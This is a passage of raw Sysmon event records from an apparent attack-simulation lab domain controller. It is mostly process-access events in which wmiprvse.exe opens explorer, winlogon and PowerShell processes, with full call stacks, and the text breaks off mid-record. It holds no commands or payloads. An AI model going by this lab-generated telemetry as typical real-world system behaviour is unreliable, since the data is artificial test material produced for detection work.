16:58:30.452{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002246785Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.437{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7119C4FD647FAFF74A0B14CEF7A07AB,SHA256=CA1FCDA25A932DF685F52956C68235A52A97390DBA1A367C385828938B78204D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002246784Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.421{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002246783Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.421{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A69D25283B2CCD78DBD39201C7822EDF,SHA256=4D11A3DBE437A8E143706EC17547D9DF46836735BA3AB103718E7E257D4D0AF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002246782Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.421{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246781Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.421{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246780Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.421{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246779Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.421{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246778Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.421{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246777Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.421{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246776Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.405{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246775Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.405{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246774Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.405{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246773Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.405{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246772Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.405{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246771Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.405{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246770Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.405{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246769Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.405{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246768Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.405{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246767Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.405{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246766Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.405{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246765Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.405{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla 